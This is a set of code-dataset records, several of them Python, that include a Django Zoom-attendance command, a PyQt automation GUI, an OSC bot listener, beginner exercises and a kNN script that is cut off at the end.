ProcedimentoShortSerializer(query_list, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n # return Response(status=status.HTTP_200_OK)\n\n def convert_date_ms(self, date_string):\n\n date_time = datetime.strptime(date_string, '%H:%M:%S').time()\n\n t_hora_str = int(date_time.strftime('%H'))\n t_min_str = int(date_time.strftime('%M'))\n t_seg_str = int(date_time.strftime('%S'))\n\n total_ms = timedelta(hours=t_hora_str, minutes=t_min_str, seconds=t_seg_str).seconds * 1000\n return total_ms\n\n def convert_ms_date_mask(self, request_ms):\n request_seconds = int(request_ms) // 1000\n out = timedelta(seconds=request_seconds)\n return str(out)\n\n\nclass RelatoriosViewSet(ModelViewSet):\n queryset = Procedimento.objects.all()\n serializer_class = RelatorioPeriodoSerializar\n\n @action(methods=['post'], detail=False)\n def processo_por_periodo(self, request):\n processo = request.data.get('processo_desc', None)\n processo_id = request.data.get('processo_id', None)\n data_inicio = request.data.get('data_inicio', None)\n data_fim = request.data.get('data_fim', None)\n\n queryset = ''\n\n try:\n data_inicio = data_inicio + ' 00:00:00'\n data_fim = data_fim + ' 23:59:59'\n\n date_inicio = datetime.strptime(data_inicio, \"%d/%m/%Y %H:%M:%S\")\n date_fim = datetime.strptime(data_fim, \"%d/%m/%Y %H:%M:%S\")\n if processo:\n queryset = Procedimento.objects.filter(processo__descricao=processo)\n\n elif processo_id:\n queryset = Procedimento.objects.filter(processo__id=processo_id)\n\n if queryset:\n\n queryset = queryset.filter(hora_inicio__range=(date_inicio, date_fim))\n\n externo = []\n interno = []\n for procedimento in queryset:\n if procedimento.tipo == 1:\n externo.append(procedimento)\n else:\n interno.append(procedimento)\n if queryset:\n\n filtro = {\n 'procedimento': '', # queryset[0].processo.descricao,\n 'data_inicio': data_inicio,\n 'data_fim': data_fim}\n\n serializer_externo = RelatorioPeriodoSerializar(externo, many=True)\n serializer_interno = RelatorioPeriodoSerializar(interno, many=True)\n\n data = {\n 'filtro': filtro,\n 'setup_externo': serializer_externo.data,\n 'setup_interno': serializer_interno.data\n }\n else:\n data = {'mensagem': 'Nenhum dado encontrado'}\n return Response(data, status=status.HTTP_200_OK)\n else:\n msg = 'Dados informados não encontrados'\n print(msg, 'queryset >> ', queryset)\n return Response({'mensagem': msg}, status=status.HTTP_404_NOT_FOUND)\n\n except Exception as e:\n print('error > ', e.args[0])\n return Response({'mensagem': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n","repo_name":"marcelcunha1991/smed","sub_path":"setup/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":20671,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35025206205","text":"############################################################\n# Licensed under the BSD 3-Clause License #\n# See https://github.com/knokbak/college/blob/main/LICENSE #\n############################################################\n\ndef division(a, b):\n try:\n val = float(a) / float(b)\n except ValueError:\n print(\"Error: Cannot divide by a non-numeric value\")\n exit(1)\n except ZeroDivisionError:\n print(\"Error: Cannot divide by zero\")\n exit(1)\n else:\n print(\"Oh my goodness, I can divide!!!!\")\n return val\n\ndef main():\n num1 = input(\"enter number: \")\n num2 = input(\"enter another number: \")\n print(f\"the answer is...{division(num1, num2)}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"knokbak/college","sub_path":"python/11-errors/bad-program.py","file_name":"bad-program.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36788864197","text":"import json\nimport logging\nimport os\nimport re\nimport requests\n\nfrom django.core.management.base import BaseCommand\nfrom collections import defaultdict\nfrom datetime import time, datetime, timedelta, date\n\n\nfrom dotenv import load_dotenv\n\nfrom dashboard.models import (\n Claas, \n IncorrectTopic,\n # IsAttendanceMarked,\n Section, \n Student,\n Subject, \n Teacher, \n TeacherZoomDetails, \n IncorrectTopic,\n # WrongEmail,\n ClaasAlias,\n)\nfrom dashboard.utils import fetch_date_time\nfrom attendance.models import StoreOnlineAttendance\n\n\n\nload_dotenv()\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(\n format='%(asctime)s-%(levelname)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')\n\nclass Command(BaseCommand):\n help = 'Get All Teachers Past meetings'\n\n def get_teacher_meetings(self, teacher_zoom_id):\n\n get_meetings_url = f'https://api.zoom.us/v2/users/{teacher_zoom_id}/meetings'\n\n header_token = os.getenv('ZOOM_API_TOKEN')\n headers = {'Authorization': f'Bearer {header_token}'}\n params = {'page_size': 300}\n payload = {}\n\n response = requests.get(\n get_meetings_url, params=params, headers=headers, json=payload\n )\n\n # NOTE: IF WE DON'T GET A VALID RESPONSE WE RETURN\n if response.status_code != 200:\n return {'status': False, 'message': 'unable to fetch meeting details'}\n\n response_json = response.json()\n\n # NOTE: WE WILL CHECK IF THERE ARE MORE MEETINGS WHICH WE CAN GET BY next_page_token\n meetings = response_json['meetings']\n\n while response_json['next_page_token']:\n params['next_page_token'] = response_json['next_page_token']\n\n response = requests.get(\n get_meetings_url, params=params, headers=headers, json=payload\n )\n\n response_json = response.json()\n meetings.extend(response_json['meetings'])\n\n return {'status': True, 'message': meetings}\n\n\n\n def get_subject_class_section_from_topic(self, topic_name):\n\n ''' NOTE: to fetch the details of class, section, subject from the meeting's topic '''\n\n splitted_topic = topic_name.split('/')\n\n if len(splitted_topic) < 3 :\n return {'status': False, 'message': 'The topic name is not valid'}\n\n subject = splitted_topic[0].strip().lower().split()\n subject = ''.join(subject)\n\n claas = splitted_topic[1].strip().lower().split()\n claas = ''.join(claas)\n\n try:\n claas_alias_qs = ClaasAlias.objects.get(name__iexact = claas)\n claas = claas_alias_qs.claas.claas_name_for_comparison\n except ClaasAlias.MultipleObjectsReturned:\n return {\n 'status': False,\n 'message' : 'Multiple Objects returned'\n }\n except ClaasAlias.DoesNotExist:\n return {\n 'status': False,\n 'message': 'The Class Alias is not present in our database'\n }\n\n sections = []\n for i in range(2, len(splitted_topic)):\n section = splitted_topic[i].strip().lower().split()\n section = ''.join(section)\n\n sections.append(\"section\" + section)\n\n return {\n 'status': True, \n 'message': {\n 'claas': claas,\n 'subject': subject,\n 'sections': sections,\n }}\n\n\n\n def find_subject_claas_section_ids(self, subject, claas, sections):\n\n # NOTE: while marking attendance we need class id which is stored in a separate table\n try:\n claas_id = Claas.objects.get(\n claas_name_for_comparison = claas\n ).claas_id\n except:\n return {'status': False, 'message': 'the claas name mentioned is incorrect'}\n\n # NOTE: while marking attendance we need section id which is stored in a separate table\n section_ids = []\n\n for section in sections:\n try:\n section_id = Section.objects.get(\n section_name_for_comparison = section, \n claas__claas_name_for_comparison = claas\n ).section_id\n section_ids.append(section_id)\n except:\n return {'status': False, 'message': 'The Section name mentioned is incorrect'}\n\n # TODO: MAY BE ISSUE SINCE WE HAVE MULTIPLE SECTION\n # NOTE: while marking attendance we need subject id which is stored in a separate table\n subject_ids = []\n\n for section_id in section_ids:\n try:\n subject_id = Subject.objects.get(\n subject_name_for_comparison = subject, \n section__section_id = section_id\n ).subject_id\n subject_ids.append(subject_id)\n except:\n return {'status': False, 'message': 'The Subject name mentioned is incorrect'}\n\n return {'status': True, 'message': {\n 'claas_id': claas_id,\n 'section_ids': section_ids,\n 'subject_ids': subject_ids,\n }}\n\n\n\n def get_meeting_instances(self, meeting_id):\n\n instances_url = f\"https://api.zoom.us/v2/past_meetings/{meeting_id}/instances\"\n\n header_token = os.getenv('ZOOM_API_TOKEN')\n headers = {'Authorization': f'Bearer {header_token}'}\n params = {}\n payload = {}\n\n instances_response = requests.get(\n instances_url, params=params, headers=headers, json=payload\n )\n\n # NOTE: IF WE DON'T GET VALID RESPONSE WE RETURN\n if instances_response.status_code != 200:\n return {'status': False, 'message': 'Unable to fetch the instances'}\n\n instances_response_json = instances_response.json()['meetings']\n\n # NOTE: IF THE RESPONSE IS VALID, WE WILL RETURN THE INSTANCES\n return {'status': True, 'message': instances_response_json}\n\n\n\n def get_instance_metrics(self, instance_uuid):\n\n # TODO: ALSO CHECK FOR NEXT PAGE TOKEN AND ADD THOSE\n metrics_url = f\"https://api.zoom.us/v2/metrics/meetings/{instance_uuid}/participants?type=past\"\n\n header_token = os.getenv('ZOOM_API_TOKEN')\n headers = {'Authorization': f'Bearer {header_token}'}\n params = { 'page_size': 300 }\n payload = {}\n\n metrics_response = requests.get(\n metrics_url, params=params, headers=headers, json=payload\n )\n\n # NOTE: IF WE DON'T GET VALID RESPONSE WE RETURN\n if metrics_response.status_code != 200:\n return {'status': False, 'message': 'Unable to fetch the metrics of the instance'}\n\n metrics_response_json = metrics_response.json()['participants']\n\n # NOTE: IF THE RESPONSE IS VALID WE WILL RETURN THE PARTICIPANTS\n return {'status': True, 'message': metrics_response_json}\n\n\n\n def get_active_time_of_participant(self, curr_participant):\n\n join_time = curr_participant['join_time'].split('T')[1]\n joined_at = time(int(join_time[:2]), int(\n join_time[3:5]), int(join_time[6:8]))\n joined_delta = timedelta(\n hours=joined_at.hour, minutes=joined_at.minute, seconds=joined_at.second)\n\n leave_time = curr_participant['leave_time'].split('T')[1]\n leaved_at = time(int(leave_time[:2]), int(\n leave_time[3:5]), int(leave_time[6:8]))\n leaved_delta = timedelta(\n hours=leaved_at.hour, minutes=leaved_at.minute, seconds=leaved_at.second)\n\n active_time = leaved_delta - joined_delta\n active_time = (active_time.seconds // 60) % 60\n\n return active_time\n\n\n\n # def generate_attendance_data(self, attendance_data, total_active_time_of_participants):\n\n # min_active_time_for_attendance = os.getenv('GET_MIN_ACTIVE_TIME_FOR_ATTENDANCE')\n\n # # NOTE: CHECK IF THE EMAIL IS PRESENT IN OUR STUDENT DATABASE OR NOT\n # for key in total_active_time_of_participants.keys():\n # try:\n # student_obj = Student.objects.get(email=key)\n\n # is_present = \"p\" if total_active_time_of_participants[key] >= int(min_active_time_for_attendance) else \"a\"\n\n # attendance_data[student_obj.student_id] = {\"status\": is_present, \"comment\": \"\"}\n # except:\n # pass\n\n # return {'status': True, 'message': 'Successfully generated'}\n\n\n\n def generate_current_section_attendance_data(self, total_active_time_of_participants, section_id):\n\n min_active_time_for_attendance = os.getenv('GET_MIN_ACTIVE_TIME_FOR_ATTENDANCE')\n curr_section_attendance_data = {}\n\n students = Student.objects.filter(section__section_id = section_id)\n\n for student in students:\n student_is_present = total_active_time_of_participants.get(student.email)\n\n is_meeting_criteria = \"a\"\n if student_is_present and total_active_time_of_participants[student.email] >= int(min_active_time_for_attendance):\n is_meeting_criteria = \"p\"\n \n curr_section_attendance_data[student.student_id] = { \"status\": is_meeting_criteria, \"comment\": \"\" }\n\n \n\n # # NOTE: FILTER STUDENTS WHO BELONGS TO THIS SECTION ONLY\n # for key in attendance_data.keys():\n # temp = Student.objects.filter(\n # student_id=key, \n # section__section_id=section_id\n # )\n\n # if temp:\n # curr_section_attendance_data[key] = attendance_data[key]\n # else:\n # pass\n\n # curr_section_attendance_data_json = json.dumps(\n # curr_section_attendance_data)\n\n return {'status': True, 'message': curr_section_attendance_data}\n\n\n def get_date_in_string(self, date_time_obj):\n \n date_in_string = date_time_obj.strftime(\"%Y-%m-%d\")\n\n return date_in_string\n\n\n def mark_classe_365_attendance(\n self,\n claas_id,\n section_id,\n subject_id,\n meeting_time,\n attendance_data,\n curr_instance_uuid,\n meeting_topic,\n curr_meeting_id,\n wrong_emails,\n curr_teacher_email,\n ):\n\n attendance_data_json = json.dumps(attendance_data)\n\n # print(attendance_data_json)\n # return\n\n academic_id = os.getenv('GET_ACADEMIC_ID')\n\n attendance_url = os.getenv('GET_MANAGE_ATTENDANCE_DATA_URL')\n header_token = os.getenv('CLASSE365_TOKEN')\n headers = {'Authorization': f'Basic {header_token}'}\n\n date = self.get_date_in_string(meeting_time)\n\n payload = {\n 'acds_id': int(academic_id),\n 'class_id': int(claas_id),\n 'section_id': int(section_id),\n 'subject_id': int(subject_id),\n 'date': date,\n 'working': 1,\n 'attendance_data': attendance_data_json\n }\n print()\n print(payload)\n\n\n # TODO: TEMPORARY\n # return\n\n\n manage_attendance_classe_365_response = requests.post(\n attendance_url, headers=headers, data=payload\n )\n\n manage_attendance_classe_365_response_json = manage_attendance_classe_365_response.json()\n\n \n try:\n is_attendance_marked_obj = StoreOnlineAttendance.objects.get(\n uuid = curr_instance_uuid\n )\n except StoreOnlineAttendance.DoesNotExist:\n section_obj = Section.objects.get(section_id = section_id)\n\n is_attendance_marked_obj = StoreOnlineAttendance(\n uuid = curr_instance_uuid,\n topic_name = meeting_topic,\n section = section_obj,\n date = meeting_time,\n attendance_status = json.loads(attendance_data_json),\n wrong_emails = wrong_emails,\n )\n\n\n if manage_attendance_classe_365_response_json['success'] == 1:\n is_attendance_marked_obj.is_marked = True\n is_attendance_marked_obj.save()\n print('attendance marked successfully')\n logger.error('attendance marked successfully')\n\n # logger.error(f\"Attendance has been marked successfully for the instance with uuid {curr_instance_uuid}\")\n else:\n is_attendance_marked_obj.is_marked = False\n is_attendance_marked_obj.save()\n\n print('error in marking attendance')\n logger.error(f\"Unable to mark attendance of the instance with uuid {curr_instance_uuid} in classe 365\")\n logger.error(\n str( datetime.now().date() )\n + \n f\" : Topic - {meeting_topic}. \"\n +\n f\"The topic is incorrect of meeting with id : {curr_meeting_id}. \"\n + \n f\"The teacher's email is : {curr_teacher_email}\"\n\n )\n\n\n\n\n def handle(self, *args, **kwargs):\n\n all_teachers = TeacherZoomDetails.objects.all()\n\n ''' NOTE: WE ITERATE OVER ALL TEACHERS AND GET IT'S MEETINGS AND MARK THE ATTENDANCE '''\n for teacher in all_teachers:\n\n print('\\n\\n\\nBEGIN :- \\nteacher zoom id' + str(teacher.zoom_id))\n\n response_meetings = self.get_teacher_meetings(teacher.zoom_id)\n\n # NOTE: IF UNABLE TO FETCH MEETINGS, WE CONITNUE FOR NEXT TEACHER\n if not response_meetings['status']:\n logger.error(\n str(datetime.now().date())\n +\n f\" : Unable to fetch the teacher meeting with id {teacher.zoom_id}. \"\n + \n f\"Teacher's email is : {teacher.teacher.email}.\"\n )\n continue\n\n # NOTE: IF WE GET A VALID RESPONSE\n meetings = response_meetings['message']\n\n\n for curr_meeting in meetings:\n\n print('topic' + curr_meeting['topic'])\n print('meeting id' + str(curr_meeting['id']))\n\n meeting_topic_splitted = curr_meeting['topic'].split('+')\n\n for meeting_topic in meeting_topic_splitted:\n\n ''' NOTE: IF MEETING ID IS ALREADY PRESENT IN INCORRECT TOPIC TABLE IGNORE IT '''\n is_present = IncorrectTopic.objects.filter(meeting_id = curr_meeting['id'])\n\n if is_present:\n logger.debug(\"The meeting's topic name is incorrect and already added in the incorrect topic table.\")\n continue\n\n response_topic = self.get_subject_class_section_from_topic(\n meeting_topic\n )\n\n\n # TODO: SEND EMAIL TO LOTUS PETAL TEAM\n # NOTE: IF THE TOPIC NAME FORMAT IS INCORRECT\n if not response_topic['status']:\n teacher_name = teacher.teacher.first_name + teacher.teacher.last_name\n meeting_start_time_str = curr_meeting.get('start_time')\n\n incorrect_topic_obj = IncorrectTopic(\n topic = meeting_topic,\n meeting_id = curr_meeting['id'],\n teacher_name = teacher_name,\n )\n if meeting_start_time_str:\n meeting_start_time = fetch_date_time(meeting_start_time_str)\n incorrect_topic_obj.meeting_time = meeting_start_time\n \n incorrect_topic_obj.save()\n \n logger.error(\n str( datetime.now().date() )\n + \n f\" : Topic - {meeting_topic}. \"\n +\n f\"The topic is incorrect of meeting with id : {curr_meeting['id']}. \"\n + \n f\"The teacher's email is : {teacher.teacher.email}\"\n )\n continue\n\n\n response_topic_message = response_topic['message']\n subject = response_topic_message['subject']\n claas = response_topic_message['claas']\n sections = response_topic_message['sections']\n\n response_subject_claas_section_ids = self.find_subject_claas_section_ids(\n subject, \n claas, \n sections\n )\n\n\n # TODO: SEND EMAIL TO THE LOTUS PETAL TEAM\n # NOTE: IF EITHER SUBJECT, CLAAS, OR SECTION IS INCORRECT OR NOT PRESENT IN OUR DB\n if not response_subject_claas_section_ids['status']:\n teacher_name = teacher.teacher.first_name + teacher.teacher.last_name\n meeting_start_time_str = curr_meeting.get('start_time')\n\n incorrect_topic_obj = IncorrectTopic(\n topic = meeting_topic,\n meeting_id = curr_meeting['id'],\n teacher_name = teacher_name\n )\n if meeting_start_time_str:\n meeting_start_time = fetch_date_time(meeting_start_time_str)\n incorrect_topic_obj.meeting_time = meeting_start_time\n\n incorrect_topic_obj.save()\n\n logger.error(\n str(datetime.now().date())\n + \n f\" : Topic - {meeting_topic}. \"\n +\n f\"Either the subject - {subject}, class - {claas}, or sections - {sections} is incorrect\"\n +\n f\" or not in our database of the meeting with id {curr_meeting['id']}. \"\n +\n f\"The teacher's email is : {teacher.teacher.email}.\"\n )\n continue\n\n response_subject_claas_section_ids_message = response_subject_claas_section_ids['message']\n\n claas_id = response_subject_claas_section_ids_message['claas_id']\n section_ids = response_subject_claas_section_ids_message['section_ids']\n subject_ids = response_subject_claas_section_ids_message['subject_ids']\n\n\n response_meeting_instances = self.get_meeting_instances(curr_meeting['id'])\n\n # NOTE: IF THERE IS ERROR WHILE FETCHING MEETING INSTANCES\n if not response_meeting_instances['status']:\n logger.error(\n str(datetime.now().date())\n + \n f\" : Unable to fetch meeting instance of meeting with id {curr_meeting['id']}. \"\n + \n f\"The teacher's email is : {teacher.teacher.email}.\"\n )\n continue\n\n curr_meeting_instances = response_meeting_instances['message']\n\n for curr_instance in curr_meeting_instances:\n\n # TODO: FROM .ENV FILE and in native time obj\n meetings_before_date_to_ignore = '2021-09-13'\n\n # TODO: MAKE IT IN SEPARATE FUNCTION\n # NOTE: IGNORE MEETINGS CONDUCTED BEFORE AUGUST\n curr_instance_date = curr_instance['start_time'].split('T')[0]\n\n curr_instance_meeting_time = fetch_date_time(curr_instance['start_time'])\n\n # TODO: Make this comparision through datetime function not string\n if curr_instance_date < meetings_before_date_to_ignore:\n print(\n str(datetime.now().date())\n +\n f\" : Since the meeting is of before {meetings_before_date_to_ignore} \"\n +\n f\"the attendance wont be marked. The instance uuid is {curr_instance['uuid']}\"\n )\n logger.error(\n str(datetime.now().date())\n +\n f\" : Since the meeting is of before {meetings_before_date_to_ignore} \"\n +\n f\"the attendance wont be marked. The instance uuid is {curr_instance['uuid']}\"\n )\n continue\n\n ''' NOTE: Ignore future meetings '''\n curr_time = datetime.now()\n if curr_instance_meeting_time > curr_time:\n print(\n str(datetime.now().date())\n + \n f\" : Since the meeting is of future timestamp :{curr_time} \"\n +\n f\"the attendance won't be marked. The instance uuid is {curr_instance['uuid']}\"\n )\n continue\n\n # NOTE: IGNORE MEETINGS WHOSE ATTENDANCE IS ALREADY MARKED\n curr_instance_uuid = curr_instance['uuid']\n\n try:\n is_attendance_marked = StoreOnlineAttendance.objects.get(\n uuid = curr_instance_uuid\n )\n\n if is_attendance_marked.is_marked:\n print(\n str(datetime.now().date())\n + \n f\"the attendance is already marked for the instance with uuid {curr_instance['uuid']}\"\n )\n continue\n except:\n pass\n\n response_instance_metrics = self.get_instance_metrics(\n curr_instance_uuid\n )\n\n # NOTE: IF THERE IS ERROR WHILE FETCHING METRICS\n if not response_instance_metrics['status']:\n logger.error(f\"Unable to fetch metrics data of the instance with uuid {curr_instance['uuid']}\")\n continue\n\n curr_instance_metrics = response_instance_metrics['message']\n\n\n total_active_time_of_participants = defaultdict(int)\n wrong_emails = {}\n\n for curr_participant in curr_instance_metrics:\n\n # NOTE: CHECKING WHETHER THE PARTICIPANT HAS JOINED WITH EMAIL OR NOT\n email = curr_participant.get('email')\n user_name = curr_participant.get('user_name')\n\n if not email: \n wrong_emails[user_name] = ''\n continue\n \n ''' NOTE: We check whether the domain is of lotuspetal ? '''\n regex = r'^[A-Za-z0-9._%+-]+@lotuspetalfoundation.org$'\n is_lotuspetal_domain = re.fullmatch(regex, email)\n\n if not is_lotuspetal_domain:\n wrong_emails[user_name] = email\n continue\n \n # TODO:\n active_time = self.get_active_time_of_participant(\n curr_participant\n )\n\n total_active_time_of_participants[email] += active_time\n\n # attendance_data = {}\n\n # self.generate_attendance_data(\n # attendance_data, \n # total_active_time_of_participants\n # )\n\n # NOTE: iterating on all section whose class has been conducted together\n # bcos we have to mark the attendance separately\n for i in range(len(section_ids)):\n section_id = section_ids[i]\n subject_id = subject_ids[i]\n \n # TODO: MIN ACTIVE TIME ?\n response_generate_current_section_attendance_data = self.\\\n generate_current_section_attendance_data(\n # attendance_data, \n total_active_time_of_participants,\n section_id\n )\n\n curr_section_attendance_data = response_generate_current_section_attendance_data['message']\n\n if not curr_section_attendance_data:\n is_attendance_marked_obj_present = StoreOnlineAttendance.objects.filter(\n uuid = curr_instance_uuid\n )\n\n if not is_attendance_marked_obj_present:\n section_obj = Section.objects.get(section_id=section_id)\n\n is_attendance_marked_obj = StoreOnlineAttendance(\n uuid = curr_instance_uuid,\n topic_name = meeting_topic,\n section = section_obj,\n # period \n date = curr_instance_meeting_time,\n attendance_status = json.dumps(curr_section_attendance_data),\n wrong_emails = wrong_emails,\n is_marked = False,\n )\n is_attendance_marked_obj.save()\n \n logger.error(f\"the attendance json didn't have any object of the instance with uuid {curr_instance['uuid']}\")\n continue\n \n print('correct topic')\n logger.debug('correct topic')\n print('zoom id' + str(teacher.zoom_id))\n logger.debug('zoom id' + str(teacher.zoom_id))\n print('topic' + curr_meeting['topic']+'\\n')\n logger.debug('topic' + curr_meeting['topic']+'\\n')\n\n self.mark_classe_365_attendance(\n claas_id,\n section_id,\n subject_id,\n curr_instance_meeting_time,\n curr_section_attendance_data, \n curr_instance_uuid, \n meeting_topic,\n curr_meeting['id'],\n wrong_emails,\n teacher.teacher.email\n )\n\n print('\\n\\n END :- ')\n logger.info('\\n\\n END :- ')\n\n print('TASK - MARK ATTENDANCE IS COMPLETE !!')\n logger.info('TASK - MARK ATTENDANCE IS COMPLETE !!')","repo_name":"Nadeem1432/Lotus-Petal-Algofocus","sub_path":"dashboard/management/commands/get_teachers_meeting.py","file_name":"get_teachers_meeting.py","file_ext":"py","file_size_in_byte":28285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19185552625","text":"# def fun(m,n):\n# l=[]\n# for i in range(m,n):\n# if isPrime(i):\n# l.append(i)\n# return l\n\n# check whether number prime or not \n# def isPrime(n):\n# for i in range(2,n//2):\n# if n%i==0:\n# return False\n# return True\n\n# m=int(input())\n# n= int(input())\n# print(isPrime(n))\n# print(fun(m,n))\n\ndef primefactor(n):\n for i in range(2,n+1):\n if n%i==0 and isPrime(i):\n print(i)\n\ndef isPrime(n):\n for i in range(2,n//2+1):\n if n%i==0:\n return False\n return True\nn=int(input())\n\nprint(primefactor(n))\n\n\n\n\n","repo_name":"SriramSololearner/Python","sub_path":"Functions/listOfPrime.py","file_name":"listOfPrime.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6807033575","text":"from PyQt5.QtWidgets import *\r\nfrom multiprocessing import Process\r\nfrom threading import Thread\r\nfrom app import Scraper\r\nfrom ui_app import *\r\nimport sys, os\r\n\r\n\r\ndef resource_path(relative_path):\r\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n try:\r\n # PyInstaller creates a temp folder and stores path in _MEIPASS\r\n base_path = sys._MEIPASS\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\n\r\nICON = resource_path(\"assets/code.ico\")\r\nprint(ICON)\r\n\r\nclass Dialog(QDialog):\r\n\tdef __init__(self, parent=None):\r\n\t\tsuper().__init__(parent)\r\n\r\n\t\tself.setWindowTitle(\"A minute!\")\r\n\r\n\t\tQBtn = QDialogButtonBox.Save | QDialogButtonBox.Cancel \r\n\r\n\t\tself.buttonBox = QDialogButtonBox(QBtn)\r\n\t\tself.buttonBox.accepted.connect(self.save)\r\n\t\tself.buttonBox.rejected.connect(self.cancel)\r\n\r\n\t\tself.layout = QVBoxLayout()\r\n\t\tself.message = QLabel(\"Enter a path to your chrome driver\")\r\n\t\tself.input_ = QLineEdit()\r\n\t\tself.input_.setGeometry(QRect(10, 10, 200, 30))\r\n\t\tself.layout.addWidget(self.message)\r\n\t\tself.layout.addWidget(self.input_)\r\n\t\tself.layout.addWidget(self.buttonBox)\r\n\t\tself.setLayout(self.layout)\r\n\t\tself.show()\r\n\r\n\tdef save(self):\r\n\t\tprint(\"saving..\")\r\n\t\twith open(os.path.join(os.getenv(\"APPDATA\"), \"driver_path.txt\"), \"w\") as f:\r\n\t\t\tf.write(self.input_.text())\r\n\t\tself.close()\r\n\r\n\tdef cancel(self):\r\n\t\tprint(\"cancelling...\")\r\n\t\tsys.exit()\r\n\r\nclass MainWindow(QMainWindow):\r\n\tdef __init__(self) -> None:\r\n\t\tQMainWindow.__init__(self)\r\n\t\tself.ui = Ui_MainWindow()\r\n\t\tself.ui.setupUi(self)\r\n\t\tself.setWindowTitle(\"Web Automator\")\r\n\t\tself.setWindowIcon(QIcon(ICON))\r\n\t\tself.ui.start_btn.clicked.connect(self.initialize_scraper)\r\n\t\tself.ui.user_input.returnPressed.connect(self.user_entry)\r\n\t\tself.driver_path_fname = os.path.join(os.environ[\"APPDATA\"], \"driver_path.txt\")\r\n\t\tself.current_event = None\r\n\r\n\t\tself.show()\r\n\t\r\n\tdef initialize_scraper(self):\r\n\t\tif not os.path.exists(self.driver_path_fname):\r\n\t\t\tdlg = Dialog(self)\r\n\t\t\tif not dlg.exec():\r\n\t\t\t\tprint(\"Dialog closed!\")\r\n\t\t\t\t\r\n\t\t\t\tself.scraper = Scraper\r\n\t\t\t\tscr = Thread(target=self.scraper, args=(self, self.driver_path_fname))\r\n\t\t\t\tscr.start()\r\n\t\t\t\tself.ui.start_btn.setEnabled(False)\r\n\t\telse:\r\n\t\t\tself.scraper = Scraper\r\n\t\t\tscr = Thread(target=self.scraper, args=(self, self.driver_path_fname))\r\n\t\t\tscr.start()\r\n\t\t\tself.ui.start_btn.setEnabled(False)\r\n \t\r\n\tdef user_entry(self, dt=None):\r\n\t\ttry:\r\n\t\t\tself.__setattr__(self.current_event, True)\r\n\t\texcept TypeError:\r\n\t\t\tself.ui.user_input.setText(\"\")\r\n \r\n\tdef set_event(self, evtname):\r\n\t\tprint(evtname)\r\n\t\tsetattr(self, evtname, None)\r\n\t\tself.current_event = evtname\r\n\t\t\r\n\r\nif __name__=='__main__':\r\n app = QApplication(sys.argv)\r\n window = MainWindow()\r\n sys.exit(app.exec_())\r\n","repo_name":"isaacrobert33/Status-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31662915866","text":"\nfrom __future__ import print_function, division\nimport sys, osc, os\n\n\nclass BotResponse(object):\n \n def __init__(self, osc_server_port=5005, osc_client_host='127.0.0.1', osc_client_port=5009):\n self.osc_server_port = osc_server_port\n self.osc_client_host = osc_client_host\n self.osc_client_port = osc_client_port\n self.osc_client = osc.Client(osc_client_host, osc_client_port)\n self.osc_server = osc.Server(host='0.0.0.0', port=osc_server_port, callback=self.osc_server_message)\n self.osc_server.run(non_blocking=True)\n \n self.osc_client.send(\"/botresponse/ready\")\n \n #self.model = torch.load(model_filename, map_location=lambda storage, loc: storage, encoding='utf8')\n #if default_allowed_filename is None:\n #self.allowed = set(self.model.dictionary.idx2word)\n #else:\n #self.allowed = set(open(default_allowed_filename).read().split('\\n'))\n #self.allowed.update('.,!:;')\n \n print(\"Ready For Getting Bot Response\")\n\n\n def osc_server_message(self, message, args):\n print(\"message entrant {}\".format(args))\n \n if '/iagotchi/botresponse' in message:\n message = message.replace('/iagotchi/botresponse', '')\n print('botresponse : {}'.format(args))\n \n elif '/iagotchi/user_tmp' in message:\n message = message.replace('/iagotchi/user', '')\n print('user_tmp : {}'.format(message))\n \n elif '/iagotchi/user' in message:\n message = message.replace('/iagotchi/user', '')\n print('user : {}'.format(message))\n \n elif '/iagotchi/session/start' in message:\n message = message.replace('/iagotchi/session/start', '')\n print('sesson start at: {}'.format(message))\n \n elif '/iagotchi/session/stop' in message:\n message = message.replace('/iagotchi/session/stop', '')\n print('session stop at: {}'.format(message))\n \n elif '/iagotchi/session/name' in message:\n message = message.replace('/iagotchi/session/name', '')\n print('user name is : {}'.format(message))\n elif message == '/exit':\n self.osc_server.shutdown()\n sys.exit(0)\n\n\nif __name__ == '__main__':\n BotResponse()\n","repo_name":"kleag/iagotchi-lasti","sub_path":"iagotchi-bot/botresponse.py","file_name":"botresponse.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21642227402","text":"\"\"\"\nThis program first reads the training and test data from the user\nand then performs a hyperparameter search using GridSearchCV to f\nind the best k value for the kNN Classifier. Finally, it trains \nthe kNN Classifier with the best k value and calculates the test accuracy.\n\"\"\"\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score\n\ndef read_data(num_samples):\n x_values = []\n y_values = []\n for i in range(num_samples):\n x = float(input(f\"Enter x value for sample {i + 1}: \"))\n y = int(input(f\"Enter y value for sample {i + 1}: \"))\n x_values.append(x)\n y_values.append(y)\n return np.array(x_values), np.array(y_values)\n\nN = int(input(\"Enter the number of training samples (N): \"))\nM = int(input(\"Enter the number of test samples (M): \"))\ntrain_x, train_y = read_data(N)\ntest_x, test_y = read_data(M)\n\n# Range of k values to search\nk_values = list(range(1, 11))\n\n\nknn = KNeighborsClassifier()\nparam_grid = {'n_neighbors': k_values}\ngrid_search = 